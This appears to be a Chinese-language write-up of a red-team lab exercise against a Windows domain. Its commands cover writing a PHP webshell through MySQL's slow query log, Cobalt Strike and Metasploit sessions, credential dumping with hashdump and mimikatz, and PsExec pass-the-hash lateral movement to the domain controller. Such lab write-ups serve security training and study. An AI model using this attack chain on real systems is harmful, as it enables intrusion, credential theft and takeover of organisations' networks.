信息搜集

namp扫描,发现存在80,3306端口

gobuster扫描,发现存在phpmyadmin和一个phpinfo.php

这里就一步带过了,实战的话没有这么简单

漏洞利用

非预期解

首页是一个探针,我发现了一个检测mysql的地方,随便一输账号密码root|root发现检测成功,这就拿到mysql弱口令了。。

root|root登陆phpmyadmin,尝试直接select into outfile写shell,失败了select @@global.secure_file_priv发现是null

image-20211013205628649

不急,就算这样也可以绕过secure_file_priv,具体可以看https://www.cnblogs.com/c1e4r/articles/8902444.html

1
2
3
4
5
6
设置slow_query_log=1.即启用慢查询日志(默认禁用)。
set global slow_query_log=1;
2.伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名
set global slow_query_log_file='dir\filename'
3.向日志文件写入shell
select '<?php @eval($_POST[1]);?>' or sleep(10);

这里的网站的绝对路径我们不知道,可以去phpinfo.php下查看,发现是C:/phpStudy/WWW

image-20211013210033844

这里直接蚁剑连接,发现他还有个cms,这里到后面我才发现,预期解应该是通过CMS来获取shell的。

内网搜集

域信息搜集

蚁剑终端输入ipconfig /all,发现存在另外一个ip 192.168.52.143,又发现存在域god.org

1
2
3
net group /domain  #查看域内所有用户列表
net group “domain computers” /domain #查看域成员计算机列表
net group “domain admins” /domain #查看域管理员用户

这里我们选择用CS生成一个木马来进行上线,我这里MSF联动CS了,可以使用蚁剑,拿到shell以后就是administrator权限

我们这里尝试getsystem,然后getuid,直接是system权限了

image-20211016111321916

拿到会话以后,我们继续搜集一下域信息,发现当前ip是192.168.52.143,他应该是两个网卡,这是内网ip

1
2
3
4
5
shell ipconfig /all   
shell net config workstation  查看是否有域,以及当前域
shell net user /domain      查看域内所有用户列表
shell net group "domain computers" /domain  查看域成员计算机列表
shell net group "domain admins" /domain  查看域管理员用户

image-20211016111751142

image-20211016111941693

我们这里在CS中也可以使用一下hashdump抓取一下密码

image-20211016112339847

再用mimikatz抓一下密码,得到当前用户登录密码为hongrisec@2019

image-20211016112517349

回到MSF,拿到meterpreter以后收集一下补丁信息以及安装的软件信息

1
2
run post/windows/gather/enum_patches
run post/windows/gather/enum_applications

image-20211013223113253

这台机子还有nmap,可以直接拿来让我们使用 

1
shell nmap -sn 192.168.52.0/24

image-20211013224700291

存活了三台,分别是138 141 143,我们可以知道当前这台是143,所以分别使用nmap对138 141进行扫描

1
2
shell nmap -sV -sC -A --script=vuln 192.168.52.141
shell nmap -sV -sC -A --script=vuln 192.168.52.138

这里可以发现域成员主机存在MS08-067MS17-010漏洞,但是由于一些原因,打不通

横向移动

socks隧道搭建

这里我们使用MSF里自带的socks4a来建立隧道(MSF6里与MSF5的貌似不同了)

1
2
3
4
5
6
run get_local_subnets   #查看路由信息
run autoroute -s 192.168.52.0/24    #添加一条路由
run autoroute -p  #查看路由信息
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 192.168.100.206

image-20211013231218116

哈希传递

计算机中的认证,不是根据原始密码认证,而是根据密文认证的。而通过传递密文成功登录就是哈希传递。

用win7这台机器中转一个监听器:

将生成的木马文件和PsExec.exe上传到win7主机,远程登录win7主机执行:

1
C:\PsExec64.exe -accepteula \\192.168.52.138 -u administrator -p cjlusec@123456 -d -c C:\beacon1.exe

传到了域控主机但是没能执行,建立ipc管道,用psexec.exe连接cmd, 最后直接拿到域控

1
net use \\192.168.52.138\ipc$ "cjlusec@123456" /user:god\administrator

image-20211015183516256

坑:这里拿到域控的CMD以后本应该运行我们的木马上线CS,但是我这里不管怎么样那个木马一运行就停止工作,所以这里我们选择在CS上来进行操作

我们这里直接在CS上使用SOCKS代理 ,然后我们创建一个SMB的监听器

image-20211016113418880

来到目标界面,导入内网的两台192.168.52.138 192.168.52.141 ,右键选择psexec,使用刚刚新建的SMB监听器,

image-20211016113706225

image-20211016121524294

image-20211016121544556

即可获取到域成员的一个会话,在选择用户名密码的时候需要选择Administrator的账号密码,同样的方法上线域控主机即可

战果图

Snipaste_2021-10-15_23-28-36

😁🤞🤞🤞🤞🌹🌹🌹